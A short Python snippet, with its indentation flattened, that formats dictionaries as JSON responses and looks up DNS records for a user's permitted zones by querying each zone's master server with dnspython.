def api_response(dictionary=None):
""" Return dictionary as a json Response object """
if dictionary is not None:
return Response(json.dumps(dictionary, indent=4, sort_keys=True), mimetype="application/json")
def search_record(record=None, user=None):
for zone_id in get_user_permissions(user=user):
zone_name = get_zone_name(zone_id=zone_id)
pattern = re.compile("^[(\w+).](\w+).%s" % zone_name)
result = {}
if pattern.match(record):
zone_view = get_zone_view(zone=zone_name)
master = get_view_server(view=zone_view)
dns_query = dns.message.make_query(record, dns.rdatatype.ANY)
dns_response = dns.query.tcp(dns_query, str(master), timeout=10)
if dns_response is not None:
for record in dns_response.answer:
record_items = str(record).split(" ")
result[zone_name] = {'rr': record_items[0],
'data': record_items[4],
'type': record_items[3],
'ttl': record_items[1]}
return result
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.